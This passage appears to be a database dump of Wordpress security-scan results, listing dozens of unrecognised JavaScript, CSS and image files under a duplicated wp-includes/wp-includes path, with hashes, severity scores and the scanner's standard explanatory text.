href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34355,1631564702,1631564702,'new','knownfile',75,'f1c2182329f7dccbd40653632b845d9c','1134eb4f1bf20def37ebc84e75ae964a','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelementplayer.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/mediaelement/mediaelementplayer.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34356,1631564702,1631564702,'new','knownfile',75,'31f2a9cd7a6ec279f3445e8bf74392d8','549a92b501573dc01ad7094a1a9413fa','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelementplayer.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/mediaelement/mediaelementplayer.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34357,1631564702,1631564702,'new','knownfile',75,'6b7ca2f297d31fc7abc622a1fee3b8f0','fe3a53badfa21857d9d99ce71a78bb44','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mejs-controls.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/mediaelement/mejs-controls.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34358,1631564702,1631564702,'new','knownfile',75,'680dea47556d8b67db0ad3bd79ed6b32','afac53d8ccf83aeff4186dca42b8f776','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mejs-controls.svg','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/mediaelement/mejs-controls.svg\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34359,1631564702,1631564702,'new','knownfile',75,'0cea071d0abf03f9ac8c5f2ab738145c','c7a3291a76d0d84cdca728dc16a01c8c','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/renderers/vimeo.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/mediaelement/renderers/vimeo.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34360,1631564702,1631564702,'new','knownfile',75,'d49b2d2426a582d75258a3ed3ac05794','c037417ab64a37ad47fd418bf7ddcabb','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/renderers/vimeo.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/mediaelement/renderers/vimeo.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34361,1631564702,1631564702,'new','knownfile',75,'cb92c7bf6980abc4e11ec719213df427','0034e60d16e44233b712b37865a0de35','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-mediaelement.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/mediaelement/wp-mediaelement.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34362,1631564702,1631564702,'new','knownfile',75,'38098a2db6318291df5c759f8e15ed65','7bc0965430ab87f79cdf8f9585353fac','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-mediaelement.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/mediaelement/wp-mediaelement.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34363,1631564702,1631564702,'new','knownfile',75,'337b90a994e3b1d6cfb76d3605bef131','3653900454d4a03e8338168a9464f718','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34364,1631564702,1631564702,'new','knownfile',75,'0c076f597d62d5ef8afce8f6578149b9','31e8953ba0a4d5417be3d09bf08bfea5','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34365,1631564703,1631564703,'new','knownfile',75,'89f41bd9e30cd991d812ff8f6bccb293','02c4709dd7d719692c3e1f16bf940405','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-playlist.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/mediaelement/wp-playlist.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34366,1631564703,1631564703,'new','knownfile',75,'1c332bfa2970b2c6e4db80e6d4f5cab9','e9f13126afcfd15edc33b9aaeb601d3e','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-playlist.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/mediaelement/wp-playlist.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34367,1631564703,1631564703,'new','knownfile',75,'32e513716150d9f01c42d3ba97d6046d','1c10779a561f95cf591becbf8b9a332f','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/handlers.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/plupload/handlers.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34368,1631564703,1631564703,'new','knownfile',75,'ab6dc14c3914c0bde75ca706cb07bb1a','a7cdae0e31ef40b1fead727d0e4d9e0a','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/handlers.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/plupload/handlers.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34369,1631564703,1631564703,'new','knownfile',25,'79e601677db28e9b5d527b445cf28505','6330b5e478c2de5babcf69b0109a212c','Old WordPress core file not removed during update: wp-includes/wp-includes/js/plupload/license.txt','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/plupload/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34370,1631564703,1631564703,'new','knownfile',75,'0d4d3c5fd03ae0c5bc575dba4b7a2639','8fbfb580fc10e46aea1552f7344c572c','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/moxie.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/plupload/moxie.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34371,1631564703,1631564703,'new','knownfile',75,'843d4cf4df0e5679d2fed43e58a80b9b','d9cc552667c958119248d8cde9435c5d','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/moxie.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/plupload/moxie.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34372,1631564703,1631564703,'new','knownfile',75,'4a677b1bc2949296065a610a7eb5764b','5bbc993176c93348854d7fcfe92bde7f','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/plupload.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/plupload/plupload.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34373,1631564703,1631564703,'new','knownfile',75,'28e82bea2a7909152e963d6190cce682','80bc77ef8692cabcda4c9b79ff9a2fb3','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/plupload.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/plupload/plupload.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34374,1631564703,1631564703,'new','knownfile',75,'02424a6375801a6f7ac145e8ba43ddbd','2c75606bbf5802230f0920734fb8bdf4','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/wp-plupload.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/plupload/wp-plupload.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34375,1631564703,1631564703,'new','knownfile',75,'5ab59ac7399512c2fbba5f882a133c9b','f076d7b646f620b0117f769d4b250b14','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/wp-plupload.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/plupload/wp-plupload.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34376,1631564703,1631564703,'new','knownfile',75,'bb9cdca2d6a41c9094caf0b0ed5040b0','bef2c34e640e30c79e966c174a966af2','Unknown file in WordPress core: wp-includes/wp-includes/js/quicktags.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/quicktags.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34377,1631564704,1631564704,'new','knownfile',75,'3636e8430ea8e08a5a43a63b925eba8e','cf7eee02e8f8de9779448656eb3618c4','Unknown file in WordPress core: wp-includes/wp-includes/js/quicktags.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/quicktags.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34378,1631564704,1631564704,'new','knownfile',75,'60adf4c534f1116d60b2004b6b18d37d','55c97302912891fac431592059e21d52','Unknown file in WordPress core: wp-includes/wp-includes/js/shortcode.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/shortcode.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34379,1631564704,1631564704,'new','knownfile',75,'e57f92f98a4fdb4b56b141a6ecff9c50','32157b60ebd0696fd63f43b07049f930','Unknown file in WordPress core: wp-includes/wp-includes/js/shortcode.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/shortcode.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34380,1631564704,1631564704,'new','knownfile',75,'646b0ea843bc996cbaccadfc84415670','03e39a78bbcd9b3920357ac8f44ebd29','Unknown file in WordPress core: wp-includes/wp-includes/js/swfobject.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/swfobject.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34381,1631564704,1631564704,'new','knownfile',75,'acba1c2ccc2224760affbbf07859a8ba','a32cb12b027667b44704749165dd41cc','Unknown file in WordPress core: wp-includes/wp-includes/js/swfupload/handlers.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/swfupload/handlers.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34382,1631564704,1631564704,'new','knownfile',75,'fae70ea06fc7cd8bf6e05cbeea192c29','104282a4d4d6198c9107bdf879f2d366','Unknown file in WordPress core: wp-includes/wp-includes/js/swfupload/handlers.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/swfupload/handlers.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34383,1631564704,1631564704,'new','knownfile',75,'09f2a09a6c0ce890d5bf1aa708e70270','8f27d80821af0a3fe18ae3aba54a31b9','Unknown file in WordPress core: wp-includes/wp-includes/js/swfupload/license.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/swfupload/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34384,1631564704,1631564704,'new','knownfile',75,'6b77944cd900626fae9515bea626ffc1','0edcfd75421e9e207daa228c7380d529','Unknown file in WordPress core: wp-includes/wp-includes/js/swfupload/swfupload.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/swfupload/swfupload.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34385,1631564704,1631564704,'new','knownfile',75,'bf88063d130a83d366b9bdc0528e72a6','30136f95cec3913729f4cc6b0774253e','Unknown file in WordPress core: wp-includes/wp-includes/js/thickbox/loadingAnimation.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/thickbox/loadingAnimation.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34386,1631564704,1631564704,'new','knownfile',75,'55e3a8c813b6cc58b6d833770242e9f8','ef92e75aa80c53eae9080eca495ba086','Unknown file in WordPress core: wp-includes/wp-includes/js/thickbox/macFFBgHack.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/thickbox/macFFBgHack.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34387,1631564704,1631564704,'new','knownfile',75,'6f53ab874e618b816ee721009bdb53b5','581ec418291fa36f1ba298fb71f782ff','Unknown file in WordPress core: wp-includes/wp-includes/js/thickbox/thickbox.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/thickbox/thickbox.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34388,1631564704,1631564704,'new','knownfile',75,'b7c965e39138888708fbc4890ec1d968','4a36a912783978cf9e4088d18424146e','Unknown file in WordPress core: wp-includes/wp-includes/js/thickbox/thickbox.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/thickbox/thickbox.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34389,1631564704,1631564704,'new','knownfile',75,'c71e81dce7dcafb493637ccd60260b04','74aef08791c91e12b36eb0c29bc8531e','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/langs/wp-langs-en.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/tinymce/langs/wp-langs-en.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34390,1631564704,1631564704,'new','knownfile',75,'bfca04010213b07658c0db50a538c4f3','172f90c754b828e4ff450b717e251a47','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/license.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/tinymce/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34391,1631564704,1631564704,'new','knownfile',75,'c9953f51b8caa4a6bd77891a181523b5','6e27fc0d83353e3799f3e8772a06c790','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34392,1631564704,1631564704,'new','knownfile',75,'0261303a9f3241c07641f34d2713fc42','2482398f3bff81105e8bce57da064da2','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34393,1631564704,1631564704,'new','knownfile',75,'91969b8d666abd5bb2ec94224a6bbce8','098b3d4dd33c1a5b577bc9fcc83553ab','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34394,1631564704,1631564704,'new','knownfile',75,'8fd0456e10499b4977cbc405e2b0c843','df44bfe07a78b51a907c3b6e22d501af','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over 